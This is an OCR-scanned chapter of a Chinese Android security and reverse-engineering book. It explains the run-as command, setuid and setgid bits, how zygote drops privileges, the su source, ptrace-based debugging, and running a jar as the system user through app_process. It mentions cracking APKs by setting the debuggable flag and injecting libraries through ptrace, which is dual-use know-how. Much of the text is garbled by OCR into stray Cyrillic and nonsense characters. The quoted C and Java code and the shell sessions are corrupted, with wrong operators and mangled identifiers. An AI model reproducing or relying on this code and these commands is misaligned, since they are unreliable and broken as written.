如 下 代码 可 以 获取 到 应 用 的 uid: 


shell@pisces:/ S ps |grep demo.systemapi 
u0_a100 9782 188 880316 49952 ffffffff 00000000 S demo.systemapi 


shell@pisces:/ $ 


这 可 以 验证 ， 查 看 上 面 提 到 的 packages.list 文 件 中 的 信息 ， 如 下 所 示 : 


com.android.apps.tag 10028 8 /data/data/com.android.apps.tag release none 
demo.systemapi 10100 1 /data/data/demo.systemapi default none 
com.shuame.sprite 10101 0 /data/data/com.shuame.sprite default 3003,1028,1015 


第 四 个 限制 : 应 用 是 否 为 debug 模 式 


之 前 说 过 ，run-as 有 一 个 最 大 的 限制 束 是 查看 应 用 的 数据 时 ， 应 用 必须 是 debug 模 式 的 ， 所 以 在 开 友 程序 的 时 候 干 万 要 保 
证 一 点 ， 残 是 debug 包 不 能 外 泄 ， 不 然 数据 融 等 于 外 泄 了 。 


言 归 正 传 ， 源 码 看 得 差不多 了 ， 看 一 下 问题 ， 在 运行 run-as 的 时 候 遇 到 的 问题 如 下 所 示 : 


C:NUsersNjiangweil-g>adb shell 
shell@pisces:/ S run-as demo.systemapi 
run-as: Package 'demo.systemapi' is unknown 
1|ѕһе11@ріѕсеѕ:/ $ 


ЕЈ НЕЯ АЧ Е: 


pkgname = argv[1]; 

if (get package info(pkgname, &info) < 0) ( 
panic("Package '$s' is unknown'Nn", pkgname); 
return 1; 


Aget package іпѓор&: 


buffer = map file(PACKAGES LIST FILE, &buffer len); 


if (buffer == NULL) 
return -1; 


再 看 map fileki: 


static void* map file(const char* filename, size t* filesize) 
( 

int fd, ret, old errno; 

struct stat st; 

size t length = 0; 

void* address - NULL; 

*filesize = 0; 

/* open the file for reading */ 

fd = TEMP FAILURE RETRY(open(filename, O RDONLY)); 

if (fd « 0) 

return NULL; 

/* get its size */ 

ret - TEMP FAILURE RETRY(fstat(fd, &st)); 

if (ret « 0) 


goto EXIT; 

/* Ensure that the file is owned by the system user */ 

if ((st.st uid !- AID SYSTEM) || (st.st gid !- AID SYSTEM)) ( 
goto EXIT; 


终于 找到 原因 了 ， 原 来 是 /data/system/packages.list 文 件 的 读 取 权限 是 AID_SYSTEM， 查 看 一 下 如 下 代码 : 


shell@pisces:/ S cd /data/system 
shell@pisces:/data/system S 11 |grep package 


-Yw------- system system 2657 2016-06-21 11:03 miui-packages.xml 
-rwxrwxrwx System package info 12674 2016-06-21 11:25 packages.list 
-rYWXIrWXIWX System system 204231 2016-06-21 11:25 packages.xml 


shellGpisces:/data/system $ 


ЇН} ЕТ, ZTIWSBFHSUHRIIRBREUER— F, Л: 


115һе11@ріѕсеѕ:/ 5 su 1000 

system@pisces:/ S run-as demo.systemapi 

k shell/2000:27937: run-as: can't execute: Permission denied 
1261 ѕуѕёетёріѕсеѕ:/ $ 


可 惜 的 是 ， 这 样 明显 是 不 行 的 ， 原 因 很 简单 ，run-as 有 限制 ， 本 身 这 个 命令 只 能 是 root 和 shell 用 户 才 可 以 访问 。 这 里 也 可 
以 看 到 ，shell 用 户 也 不 比 system 用 户 权限 低 ， 所 以 要 视 情 况 而 定 来 看 root、system、shell 这 三 个 用 户 的 权限 范围 。 
那么 再 使 用 root 用 户 去 尝试 一 下 ， 如 下 所 示 : 


shell@pisces:/ 5 su 
root@pisces:/ # run-as demo.systemapi 
root@pisces:/data/data/demo.systemapi $ 


这 是 可 以 的 ， 因 为 run-as 的 权限 验证 通过 了 。 


从 上 面 的 几 个 限制 可 以 看 到 ， 首 先 root 的 vid 限制 可 以 放行 ， 然 后 是 debug 模 式 可 以 放行 ，packages.list 文 件 的 访问 权限 是 
system， 但 是 这 对 于 root 用 户 来 说 没有 限制 ， 因 为 在 文件 的 读 取 权 限 上 root 可 以 操作 任何 文件 ，demo.systemapi 的 uid 可 以 放 


HERR: 这 里 运行 完 frun-as 命 令 之 后 ， 进 入 /data/data/demo.systemapi 目 录 下 ， 看 到 变 成 了 sh 命令 ，# 变 成 $ 了 ， 这 其 实 是 run-as 在 


启动 一 个 shell 程 序 ， 可 以 查看 tun-as 的 源码 : 


/* User specified command for exec. */ 


li {атас >a 3 jJ 1 
if (execvp(argv[2], argv+2) < 0) { 
panic("exec failed for $s Error:$sWMn", argv[2], strerror(errno)); 


return -errno;j 


zl EL Te Т 73H 43811run-asip <, Z-WBSIEREIUSXAU y, SEABJSAUSIÍI, GEE root, XIRAR 
开始 说 的 有 操 出 入 ， 因 为 本 身 run-as 命 令 束 是 可 以 在 非 root 设 备 上 查看 debug 模 式 下 应 用 的 沙 盒 数据 ， 那 现在 root 了， 还 有 什 
么 意义 呢 ? 其 实 不 是 的 ，run-as 命 令 很 特殊 。 找 到 一 个 没有 root 的 设备 ， 然 后 运行 [un-as 命 令 ， 结 果 如 下 所 示 : 

shell@pisces:/ $ su 

/system/bin/sh: su: not found 


127]shellG8pisces:/ S run-as demo.systemapi 
shellapisces:/data/data/demo.systemapi $ 


也 是 可 以 运行 成 功 的 ， 而 且 这 个 设备 没有 root。 但 是 在 上 面 已 经 root 的 设备 上 运行 run-as 却 报错 ， 为 什么 呢 ? 下 面 就 开始 
本 章 的 主要 内 容 ， 即 为 何 没 有 root，run-as 命 令 还 能 运行 成 功 ， 进 入 指定 的 应 用 目录 下 。 


是 这 样 的 : 开始 的 时 候 为 了 讲解 run-as 源 码 和 一 些 前 提 知 识 ， 做 了 一 件 事 ， 残 是 修改 了 run-as 命 令 的 权限 ， 如 下 所 示 : 


C:\Users\jiangweil-g>adb shell 

shell@pisces:/ $ su 

root@pisces:/ # cd /system/bin 

root@pisces:/system/bin # 11 !grep run-as 

-rwsr-sr-x root shell 9440 2016-06-21 13:27 run-as 
rootQGpisces:/system/bin # chmod 0755 run-as 
rootG8pisces:/system/bin # 11 |grep run-as 

-rwxr-xr-x root shell 9440 2016-06-21 13:27 run-as 
rootü8pisces:/system/bin # 


£r&run-asfip УАУ: 
Аиа root shell 9440 2016-06-21 13:27 run-as 
然后 修改 了 它 的 权限 chmod 0755 run-as， 变 成 

-rwxr-xr-x root shell 9440 2016-06-21 13:27 run-as 
这 个 操作 是 为 了 开始 本 章 内 容 。 
下 面 把 run-as 权 限 改 回 原来 的 值 ， 然 后 再 运行 run-as， 如 下 所 示 : 


root@pisces:/system/bin # chmod 6755 run-as 
root8pisces:/system/bin # exit 
ѕһе11@ріѕсеѕ:/ 5 run-as demo.systemapi 
shellGa8pisces:/data/data/demo.systemapi S 


10.2 ”Linux 中 的 setuid 和 setgid 概 念 


那么 问题 来 了 ， 为 何 改 了 一 个 权限 ， 就 会 导致 run-as 运 行 报错 了 呢 ? 修改 的 命令 是 : 
chmod 0755 run-as 


修改 之 后 的 权限 是 : 


-rwxr-xr-x root shell 9440 2016-06-21 13:27 run-as 


TIED BUE T XS, ехаў fs, kOESAIBISRWE? 


这 就 引出 了 本 节 的 话题 : 关于 Linux 中 的 setuid 和 setgid| 问 题 。Linux 中 的 setuid 和 setgid 是 什么 呢 ? Android 中 有 哪些 场景 
会 用 到 它们 呢 ? 下 面 来 一 一 讲解 。 


1.Linux 中 的 setuid 和 setgid 概 念 


Linux/Unix 下 的 可 执行 文件 一 旦 被 设置 了 setuid 标 记 ， 使 用 该 可 执行 程序 的 进程 束 将 拥有 该 执行 文件 的 所 有 者 权限 。 普 通用 
尸 执 行 这 个 命令 ， 可 使 目 己 升级 为 root 权 限 。 


设置 setuid 的 方法 是 : chmod 4755 program 或 chmod u-s program (setuid 只 对 文件 有 效 ) 。 


设置 setgid 的 方法 是 : chmod 2755 dir 或 chmod g+s dir (setgid 只 对 目录 有 效 ) 。 


同时 设置 setuid、setgid 的 方法 是 : chmod 6755 programit SM AM, chmod 1777 file 或 chmod о+ї file (粘着 位 只 
对 文件 有 效 ) 当 一 个 目录 被 设置 为 “粘着 位 ” (用 chmod a+t) ， 则 该 目录 下 的 文件 只 能 由 以 下 人 员 删 除 : 


和 人 月 上 
- 超级 管理 员 
` 该 目录 的 所 有 者 
` 该 文件 的 所 有 者 


也 残 是 襄 ， 即 便 该 目录 是 任何 人 都 可 以 写 ， 但 也 只 有 文件 的 属 主 才 可 以 删除 文件 。 那 么 如 何 使 用 chmod 命 令 修改 文件 的 权 
限 ， 和 这 两 个 浮 数 有 什么 关系 呢 ? 修 改 文件 权限 的 命令 是 chmod， 后 面 跟 字母 组 合 或 者 数字 组 合 。 


注意 : Andtoid 中 的 toolbox 对 chmod 命 令 做 了 限制 ，chmod 只 能 使 用 数字 代替 字母 来 修改 文件 的 权限 ， 看 下 面 例子 : 


root@pisces:/data/system # chmod u+s packages.list 
Bad mode 


10 гоос@ріѕсеѕ: /data/system # 


这 里 使 用 字母 组 合 方式 来 修改 文件 权限 报错 了 : Bad mode, 为 Google 上 和 目 带 的 toolbox 中 chmod 语 法 不 支持 +X、 -xo 
2.chmod 命 令 的 用 法 和 参数 详解 
知道 Linux 中 的 文件 权限 构造 之 后 ， 可 以 使 用 | 命令 查看 一 个 文件 ， 格 式 类 似 下 面 这 样 : 


—LIWXI-XI-X 


下 面 解析 一 下 这 个 格式 所 表示 的 意思 。 
这 种 表示 方法 一 共有 10 位 : 


9 8B 7 6 5 4 321 Ü 
- F W X T — X F -xX 


第 9 位 表示 文件 类 型 ， 可 以 为 p、d、|、s、c、b 和 -: 


` qd 表示 目录 文件 

.1 表示 符号 连接 文件 
· S 表 示 socket 文 件 

` c 表 示 字 符 设备 文件 


“b 表 示 块 设备 文件 


-表示 首 通 文件 

第 8 ~ 6 位 、5 ~ 3 位 、2 ~ 0 位 分 别 表示 文件 所 有 者 的 权限 、 同 组 用 户 的 权限 、 其 他 用 户 的 权限 ， 其 形式 为 rwx: 
.表示 可 读 ， 可 以 读 出 文件 的 内 容 ， 对 应 的 数字 是 4。 

“ W 表 示 可 写 ， 可 以 修改 文件 的 内 容 ， 对 应 的 数字 是 2。 

.x 表示 可 执行 ， 可 运行 这 个 程序 ， 对 应 的 数字 是 1。 

那么 ， 可 以 知道 [wx 的 组 合 就 是 7=1+2+4。 


如 果 想 修改 文件 的 权限 为 所 有 者 是 rwx， 同 组 用 尸 的 权限 是 r--， 其 他 用 尸 的 权限 是 --x， 命 令 如 下 : 


chmod u=rwx,g=r,o=x file 


这 里 看 到 : ufORBITE, ОКР, of ЕЕЕ, 
使 用 数字 更 简单 : 


chmod 714 file 


:7 代表 所 有 者 : 19244 

1 代表 同 组 用 户 : 1 

- 4 代表 其 他 用 户 : 4 

如 下 所 示 ， 可 以 看 到 文件 的 权限 : 


10 |root@pisces:/data/system # 11 


drwxrwxr-x system system 2016-06-21 13:41 app_screenshot 
-Yw------- system system 2844 2016-06-21 13:41 batterystats.bin 
-YW------- system system 358 2016-06-21 13:34 called pre boots.dat 
drwxr-xr-x system system 2016-06-21 13:41 customized icons 
drwx------ system system 2016-06-21 13:42 dropbox 

drwx------ root root 2016-06-21 13:41 enable theme 
-YW------- system system 4096 2016-06-21 13:41 entropy.dat 

-YW------- system system 130 2016-06-21 13:34 framework atlas.config 
drwx------ system system 2016-06-21 13:32 ifw 

drwx------ system system 2016-06-21 13:33 inputmethod 

drwx------ system system 2016-06-21 13:35 job 

-rw-t--r-- root root 16 2016-06-20 13:43 kushuamebuildin.data 
-Yw------- system system 657 2016-06-21 13:44 locationpolicy.xml 
-rw-rw---- system system 4096 2016-06-21 13:34 locksettings.db 
-rw-rw---- system system 32760 2016-06-21 13:41 locksettings.db-shm 
-rw-rw---- system system 57712 2016-06-21 13:34 locksettings.db-wal 
-Yw------- system system 72 2016-06-21 13:42 miui-wakeuptime.xml 


下 面 骨 来 看 一 下 如 何 修 改 文件 为 setuid 和 setgid。 设 置 之 后 文件 相应 被 设置 了 SUID 或 SGID 位 ,分 别 表现 在 所 有 者 或 同 组 用 
尸 权限 的 可 执行 位 上 。 例 如 : 


1) -rwsr-xr-x 表 示 SUID 和 所 有 者 权限 中 可 执行 位 被 设置 。 

2) -rwsr--r-- 表 示 SUID 被 设置 ， 但 所 有 者 权限 中 可 执行 位 没有 被 设置 。 

3) -rwxr-sr-x 表 示 SGID 和 同 组 用 户 权 限 中 可 执行 位 被 设置 。 

4) -rw-r-sr-- 表 示 SGID 被 设置 ， 但 同 组 用 户 权 限 中 可 执行 位 没有 被 设置 。 

其 实 ， 在 Unix 的 实现 中 ， 文 件 权限 用 12 个 二 进 制 位 表示 ， 如 果 该 位 上 的 值 是 1， 表 示 有 相应 的 权限 : 


11109 S / G 5 & 3 2 1 Q0 
S а tr W X T WX T W X 


第 11 位 为 SUID 位 ， 第 10 位 为 SGID 位 ， 第 9 位 为 粘着 位 ， 第 8 ~ 0 位 对 应 于 上 面 的 三 组 rwx 位 。 
-rwsr-xr-x 的 值 为 : 100111101101 

-rw-r-sr-- 的 值 为 : 010110100100 

1) 所 有 者 的 s 位 对 应 的 数字 是 : 4 

2) 所 有 组 的 s 位 对 应 的 数字 是 : 2 

3) 粘着 位 对 应 的 数字 是 : 1 

给 文件 加 SUID 和 SUID 的 命令 如 下 : 

1) chmod u+s filename 设 置 SUID 位 

2) chmod u-s filename 去 掉 SUID 设 置 

3) chmod g+s filename 设 置 SGID 位 

4) chmod g-s filename 去 掉 SGID 设 置 

也 可 以 用 八进制 表示 方法 来 设置 ， 如 果 明 白 了 前 面 的 12 位 权限 表示 法 ， 八 进 制 方法 也 很 简单 。 
使 用 数字 来 设置 文件 的 SUID、SGID、 粘 着 位 : 


chmod 7555 file 


第 一 位 的 7 就 代表 1+2+4， 即 设置 了 三 个 位 。 


10.3 Android 中 setuid 和 setgid 的 使 用 场景 


前 面 介 绍 了 Linux 中 setuid、setgid 的 用 法 和 作用 ， 以 及 如 何 使 用 chmod 命 令 来 操作 。 下 面 就 来 看 看 Android 中 有 哪些 场景 
用 到 了 setuid、setgid。 


1.zygote 降 权 处 理 


首先 不 得 不 说 zygote 这 个 进程 ，Android 中 应 用 局 动 的 过 程 都 是 和 这 个 进程 息息相关 的 ， 每 个 应 用 启动 都 是 来 找 zygote 做 
事 的 。zygote 局 动 之 后 ， 人 比如 应 用 的 局 动 ， 然 后 
zygote 就 fork 出 一 个 进程 ， 开 始 运转 。 那 么 问题 来 了 ， 在 Linux 中 ， 父 进程 fork 出 一 个 子 进 程 ， 默 认 子 进程 会 拥有 和 父 进程 一 样 
的 uid， 那 么 zygote 是 root 用 户 的 ， 按 照常 理 ， 所 有 fork 出 来 的 应 用 都 是 root 用 户 了 ， 看 上 去 很 危险 一 一 每 个 应 用 都 有 root 权 限 
了 。 其 实 每 个 应 用 只 有 指定 的 权限 ， 这 是 由 于 zygote 使 用 setuid、setgid 做 了 降 权 处 理 ， 如 下 所 示 : 


root@pisces:/ # ps lgrep zygote 

root 188 1 860036 64784 ffffffff 401406b8 S zygote 
гоо@ріѕсеѕ:/ # 

下 面 来 看 一 下 源码 : dalvik system Zygote.cpp. 

提示 : 源码 位 置 : Android 源 码 \dalvik\vm\native\dalvik_system_Zygote.cpp 


zygote 中 主要 做 处 理 的 是 forkAndSpecializeCommon 水 数 ， 如 下 所 示 : 


static pid t forkAndSpecializeCommon (const u4* args, bool isSystemServer) 


pag ÉE pid: 
uid t uid = (uid t) args[01:; 
gid- t gid = (gid t) args[1]; 


ArrayObject* gids (ArrayObject *)args[2]; 

u4 debugFlags = args[3]; 

ArrayObject *rlimits = (ArrayObject *)args[4]; 

u4 mountMode = MOUNT EXTERNAL. NONE; 

int64 t permittedCapabilities, effectiveCapabilities; 
&ifdef HAVE SELINUX 

char *selnfo = NULL; 

char *niceName - NULL; 
tendif 


往 下 面 看 : 


err = setgid(gid); 
if (err < 0) { 
ALOGE("cannot setgid($d): $s", gid, strerror(errno)); 
dvmAbort () ; 
} 
err = setuid(uid); 
if (err < 0) { 
ALOGE ("cannot setuid($d): $s", uid, strerror(errno)); 
dvmAbort(); 


文 里 将 fork 出 来 的 进程 的 gid 和 uid 设 置 成 上 层 传递 过 来 的 值 ， 从 而 实现 降 权 。 


这 里 还 有 一 个 函数 enableDebugFeatures， 这 个 函数 是 干什么 的 ， 其 实 看 到 名 字 都 知道 ， 让 一 个 应 用 具备 可 调试 功能 ， 在 
debug 的 情况 下 : 


/* configure additional debug options */ 
enableDebugFeatures (debugFlags); 


继续 往 下 看 : 
static void enableDebugFeatures(u4 debugFlags) 


{ 


ALOGV("debugFlags is 0х%02х", debugFlags); 


gDvm.jdwpAllowed = ((debugFlags & DEBUG ENABLE DEBUGGER) !- 
if ((debugFlags & DEBUG ENABLE CHECKJNI) != 0) { 


/* turn it on if it's not already enabled */ 
dvmLateEnableCheckedJni(); 


if ((debugFlags & DEBUG ENABLE JNI LOGGING) !- 0) ( 
gDvmJni.logThirdPartyJni = true; 


注意 ， 在 gDvm.jdwpAllowed 字 段 判 断 时 可 以 看 到 ，Java 中 的 调试 系统 还 是 很 复杂 的 ， 由 jdb、jdbserver、jwdp 组 成 ， 这 
里 遵从 的 是 C/s 模 式 : 


“jdb 是 客户 端 ， 需 要 调试 的 应 用 。 
: jdbservet 是 服务 器 端 ， 调 试 代 码 信 息 处 理 的 那 一 端 。 

‚ jwdp 是 调试 协议 。 

而 且 每 个 可 以 调试 的 应 用 局 动 之 后 ， 都 会 有 一 个 jwdp 线 程 来 运作 这 些 事 ， 可 以 使 用 : 
ps -t 进程 号 

来 查看 进程 的 线程 ， 如 下 所 示 : 


llrootüpisces:/ # ps igrep demo.systemapi 


цо a100 9782 188 880316 49952 ffffffff 4014171c S demo.systemapi 
rootGpisces:/ # ps -t 9782 

USER PID PPID VSIZE RSS WCHAN PC NAME 

u0_al00 9782 188 880316 49952 ffffffff 4014171с S demo.systemapi 
u0_a100 9791 9782 880316 49952 c00abf84 40141910 S GC 

uO. a100 9792 9782 880316 49952 c0078938 40141150 S Signal Catcher 
uO. a100 9793 9782 880316 49952 c014ddd4 40140608 S JDWP 

u0_al00 9795 9782 880316 49952 c00abf84 40141910 S Compiler 

uO a100 9796 9782 880316 49952 c00abf84 40141910 S ReferenceQueueD 
uO. a100 9797 9782 880316 49952 c00abf84 40141910 S FinalizerDaemon 
uO., a100 9798 9782 880316 49952 c00abf84 40141910 S FinalizerWatchd 
uO. a100 9799 9782 880316 49952 c0590160 4014056c S Binder 1 

uO, a100 9800 9782 880316 49952 c0590160 4014056с S Binder 2 

uO. a100 9827 9782 880316 49952 с00ар#84 40141910 S demo.systemapi 


rootGpisces:/ # 


这 里 介绍 的 内 容 是 为 了 接 下 来 分 析 Android 中 的 调试 工具 gdb、gdbserver 做 准备 的 。 
2.SU 工 具 原 理 


Android 手 机 的 root 原 理 是 : 一 个 普通 的 进程 通过 执行 Su， 从 而 获得 一 个 具有 root 权 限 的 进程 。 有 了 这 个 具有 root 权 限 的 进 
程 之 后 ， 束 可 以 想 干 什么 束 干 什么 了 。su 所 做 的 事情 其 实 很 简单 ， 它 再 fork 男 外 一 个 子 进程 来 做 真正 的 事情 ， 也 就 是 在 执行 su 
的 时 候 后 面 所 跟 的 那些 参数 。 由 于 运行 su 的 进程 的 uid 是 root， 因 此 由 它 fork 出 来 的 子 进程 的 uid 也 是 root， 于 是 子 进程 也 可 以 想 
干什么 丈 干 什么 了 。 不 过 ， 用 来 root 手 机 的 su 还 会 配合 另外 一 个 称 为 superuser 的 App 来 使 用 。su 在 fork 子 进程 来 做 真正 的 事情 
之 前 ,会 先 启动 superuser， 询 问 用 户 是 否 允 许 fork 一 个 uid 是 root 的 子 进程 。 这 样 就 可 以 对 root 权 限 进行 控制 ， 避 免 被 恶意 应 
用 偷偷 地 使 用 。 


下 面 来 看 看 su 的 源码 ， 如 图 10-5 所 示 。 


Jsage: " 
su 1000 «T 命令 的 用 法 
su 1000 15 -1 
" 
int main(int argc, char **argv) 


1 


struct passwd *pw; 
int uid, gid, myuid; 


人 一 如 宁 不 指定 具体 的 uid， 那 
么 默认 就 是 root 用 户 0 


if(pw == Ө) { AK BUM f ААУ ша 


uid - gid - atoi(argv[1]); 
) else í 

uid - pw-»pw uid; 

gid - pw-»pw gid; 


} 


/* Until we have something better, only root and the shell can use su. * 
myuid - getuid(); 
if (myuid !- AID ROOT && myuid !- AID SHELL) { 

fprintf(stderr,"su: uid %d not allowed to su Vn", myuid); 

return 1; 


if(setgid(gid) || setuid(uid)) { 


fprintf(stderr,"su: permission deniedWMn"); T ' . i 
а I ' 这 里 开始 设置 ша 和 gid 


return 1; 


/* User specified command for ехес. */ 
if (агас == 3 ) 1 
if (execlp(argv[2], argv[2], NULL) < 9) í 
fprintf(stderr, "su: exec failed for %s Еггог:%5\п", argv[2], 
strerror(errno)); 
return -errno; 


图 10-5 su 的 源码 
可 以 看 到， 这 里 就 是 用 了 setuid 和 setgid 来 设置 指定 的 uid， 如 果 没 有 指定 uid， 上 默认 是 root 用 户 ，uid=0。 
3.run-as 命 令 


上 面 说 到 使 用 chmod 命 令 可 达到 setuid 等 效果 ， 在 Android 中 也 有 类 似 的 场景 ， 前 面 分 析 的 run-as 命 令 束 是 一 个 很 好 的 例 


子 ，run-as 命 令 本 身 的 uid 是 root，gid 是 shell。 


如 果 用 chmod 6755 run-as 设 置 完 权限 之 后 如 下 面 的 代码 所 示 ， 就 具备 了 这 种 功能 ， 即 只 要 运行 run-as 命 令 的 用 户 就 会 立 
马 升 级 到 root 用 户 ， 因 为 root 用 户 可 以 进入 任何 应 用 的 data/data/ 目 录 下 : 


root@pisces:/system/bin d$ 11 !grep run-as 
-rwsr-sr-x root shell 9440 2016-06-21 13:27 run-as 
rootGpisces:/system/bin # 


现在 也 知道 了 前 面 为 什么 修改 了 run-as 命 令 之 后 会 报错 ， 然 后 修改 回来 之 后 又 可 以 了 。 


从 这 里 可 以 看 到 Android 中 的 run-as 命 是 很 危险 的 ， 虽 然 它 本 身 有 很 多 限制 ， 但 追根 到 底 还 是 Linux 中 setuid 的 安 
全 性 最 为 值得 考究 ，setuid 的 危险 性 还 是 很 大 的 。 


10.4 ”run-as 命 令 的 作用 


现在 知道 了 run-as 命 令 能 够 在 非 root 设 备 上 查看 debug 模 式 的 应 用 沙 盒 数 据 ， 其 实 它 还 有 一 个 重要 作用 ， 残 是 为 Android 中 
的 调试 做 基础 。 上 面 在 分 析 zygote 源 码 的 时 候 提 到 了 Java 中 的 调试 系统 jdb， 其 实 Android 中 的 调试 系统 是 gdb， 通 过 gdb 和 
gdbserver 来 调试 App。 有 具体 来 遍 ， 融 是 gdbserver 通 过 ptrace 附 加 到 目标 App 进 程 去 ， 然 后 gdb 再 通过 socket 或 者 pipe 来 链接 
gdbserver， 并 且 疝 它 发 出 命令 来 对 App 进 程 进 行 调试 。 需 要 注意 以 下 关键 点 : 


` 每 一 个 需要 调试 的 apk 在 打包 的 时 候 都 会 带 上 一 个 gdbservetr， 为 手机 上 面 不 带 有 gdbsetvet 工 具 。gdbsetvet 用 来 通过 pttace 
附加 到 要 调度 的 App 进 程 去 。 


- 要 注意 bttace 的 调用 。 一 般 来 说 ， 只 有 toot 权 限 的 进程 可 以 调用 。 人 例如， 如果 我 们 想 通 过 pttrace 向 目标 进程 注入 一 个 so， 那 
么 就 需要 在 toot 过 的 手机 上 向 Su 申请 toot 权 限 。 但 是 ， 这 不 是 绝对 的 。 如 果 一 个 进程 与 目标 进程 的 uid 是 相同 的 ， 那 么 该 进程 就 具 
有 调用 bttace 的 权限 。8gdqbsetvet 在 调试 一 个 App 之 前 ， 首 先 要 通过 pttface_attach 来 附加 到 该 App 进 程 去 。bttace_attach 在 执行 实际 操作 
后 ， 会 调用 ptrace_may_access 来 检查 调用 进程 的 权限 ， 如 果 调 用 进程 与 目标 进程 具有 相同 的 uid 和 gid， 那 么 权限 检查 通过 。 五 
则 的 话 ， 就 要 求 调 用 者 进程 具有 执行 pttace 的 能 力 ， 这 是 通过 另外 一 个 函数 pttace_has_cap 来 检查 的 。 如 果 调 用 进程 的 uid 是 toot， 
那么 bttface_has_cap 一 定 会 检查 通过 。 当 然 ， 通 过 了 上 述 两 个 权限 检查 之 后 ， 还 要 接受 内 核 安 全 模块 的 检查 ， 这 就 不 是 通过 uidq 或 
者 capability 这 一 套 机 制 来 控制 的 了 。 


如 何 让 gdbservet 进 程 的 uid 与 要 调试 的 App 进 程 的 uid 一 样 ? 因为 在 没有 toot 过 的 手机 上 要 想 获 得 toot 权 限 是 不 可 能 的 ， 此 


只 能 选择 以 目标 进程 相同 的 uid 运 行 这 个 方法 。 这 时 可 以 使 用 run-as 工 具 。 


到 这 里 知道 了 ， 在 Android 中 要 调试 一 个 程序 ， 首 先 这 个 程序 必须 是 debug 模 式 的 ， 也 就 是 在 AndroidManifest.xml 中 设置 
的 属性 ， 所 以 以 往 在 使 用 动态 方式 破解 apk 的 时 候 ， 首 先是 反 编 译 ， 然 后 修改 XML 中 的 debug 属 性 ， 然 后 才能 进行 代码 天 联 调 
试 ， 而 且 动 态 调 试 so 的 强大 工具 IDA 也 是 利用 附加 到 目标 进程 中 才 进 行 调试 的 ， 原 理 和 这 里 的 gdb 一 样 。 


10.5 ”调用 系统 受 uid 限 制 的 API 


前 面 说 了 几 次 关于 降 权 的 问题 ， 再 用 一 个 例子 来 详细 介绍 Android 中 如 何 降 权 ， 这 个 例子 是 模拟 一 个 系统 的 AP1， 但 是 这 个 
API 只 允许 system 用 户 调 用 ， 代 码 如 下 : 


public class SystemUtils { 
private final static int SYSTEM_UID = 1000; 


public static String getModelNanme (){ 
int myUid - android.os.Process.myUid(); 
if(myUid !- SYSTEM UID)( 
return "uid is not system no permission..."; 


) 


return "1.0"; 


这 里 做 了 用 户 uid 的 判断 ， 如 果 不 是 System 用 户 ， 直 接 返 回 错误 信息 。 为 了 简单 ， 也 是 为 了 向 用 户 演 示 Android 中 如 何 执行 
jar 功 能 ， 这 里 再 加 一 个 入 口 类 : 
public class Main { 
public static void main(String[] args)( 
System.out.println("exec main..."); 


String modelName - SystemUtils.getModelName(); 
System.out.println("modelName:"-«modelName); 


把 项 目 导出 jar， 然 后 用 dx 命令 进程 转化 成 dex， 因 为 Android 中 是 不 识别 class 文 件 的 ， 它 只 识别 dex 文 件 : 


dx --dex --output= 输入 的 dex 目录 文件 输入 的 jar 文件 


然后 将 生成 的 classes.dex 文 件 塞 到 jar 中 ， 直 接 使 用 压缩 软件 就 可 以 了 ， 如 图 10-6 所 示 。 


Ур. He (C) ТЕ) 


收藏 夫 (O) ЖЫ 


h META-INF 


| |Cclasses.dex 


10-6 ”压缩 软件 查看 jar 文 件 
然后 把 exec.jar 导 入 设备 的 /data 目 录 下 ， 如 下 所 示 : 


E: Android 安全 防护 和 逆向 教程 \ 代码 \ 第 2 章 \Android 中 的 run-as>adb push exec.jar /data 
36 KB/s <1114 bytes in 0.030s> 


Jš Еехесјаг BS SENSE EB, 54780: 
- export CLASSPATH jat 的 路 径 。 
- exec/system/bin/app_process jat 的 目录 jar 中 的 入 口 类 。 


为 了 演示 ， 例 子 都 是 在 root 用 户 下 做 的 操作 ， 如 下 所 示 : 


shellüpisces: Zu 
rootBpisces:/ # |ехрокі CLASSPATH=/datarexec. jar | 4—— ix ЖЕЛ Ат 


rootÜpisces:^/^ H exec ^/suystem^/binz/app process “даа demo.suystemapi.Main 
exec main... 


odelMame:uid is not system no permission... «7 10628 


运行 成 功 ， 看 到 打印 的 log 人 信息， 权限 拒 绝 了 ， 因 为 只 能 允许 system 用 户 访问 ， 下 面 惑 用 su 降 权 到 System 再 运行 ， 如 下 所 
ZR: 


shellíi*pisces:^ 5 su 1BBB 


systemiàpisces:^/ S| export CLaSSPRTH-A/data^/exec.;jar 


systemBpisces: Š exec ^/system^/bin/app process ^ а demo.sustemapi.Main 
exec main... 


成 功 获 取 每 次 切换 用 户 的 时 候 需 
shellüpisces:^ = 重新 设置 环境 变量 


HER 每 次 切换 用 户 的 时 候 ， 一 定 要 记得 重新 设置 一 下 类 变量 ， 不 然 会 运行 失败 的 。 


成 功 获取 到 值 了 。 总 结 一 下 步骤 : 

1) 导出 可 执行 的 jar 文 件 。 

2) 使 用 dx 命令 将 class 文 件 转化 成 dex 文 件 。 

3) 将 转化 之 后 的 dex 文 件 塞 到 jar 文 件 中 ， 然 后 导入 设备 的 指定 目录 。 
4) 设置 可 执行 jar 文 件 到 类 环境 变量 中 。 

5) 执行 app_process 命 令 ， 运 行 jar 文 件 。 


补充 一 些 说 明 : 上 面 看 到 了 可 以 成 功 使 用 app_process 命 令 来 运行 一 个 jar 文 件 ， 关 于 app_process 的 相关 知识 网 上 有 很 多 资 
料 ， 它 是 Android 系 统 中 局 动 Java 代 码 的 关键 。 这 里 也 可 以 直接 运行 dex 文 件 ， 使 用 命令 dalvikvm。 


首先 将 上 面 执行 dx 命令 后 的 classes.dex 文 件 adb 放 到 /data 目 录 下 ， 如 下 所 示 : 


E:NAndroid 安全 防护 和 逆向 教程 \ 代码 \ 第 2 章 \Android 中 的 run-as>adb push classes.dex /data 
44 KB/s «1368 bytes in 0.030s» 


然后 执行 dalvikvm 命 令 ， 如 下 所 示 : 
dalvikvm -cp dex 文件 路 径 入 品类 


C:\Users\jiangweil-g>adb shell 

shell@pisces:/ 5 su 

root@pisces:/ # dalvikvm -cp /data/classes.dex demo.systemapi.Main 
exec main... 


modelName:uid is not system по permission... 
root@pisces:/ # 


这 里 同样 看 到 权限 拒绝 ， 降 级 切换 到 system 用 户 ， 如 下 所 示 : 


shell@pisces:/ 5 su 1000 

system@pisces:/ S dalvikvm -cp /data/classes.dex demo.systemapi.Main 
exec main... 

modelName:1.0 

systemapisces:/ $ 


了 解 了 如 何 使 用 app_process 来 运行 jar 文 件 ， 便 体验 到 了 Android 中 一 些 API 的 访问 限制 该 如 何 处 理 ， 主 要 是 用 su 来 进行 降 
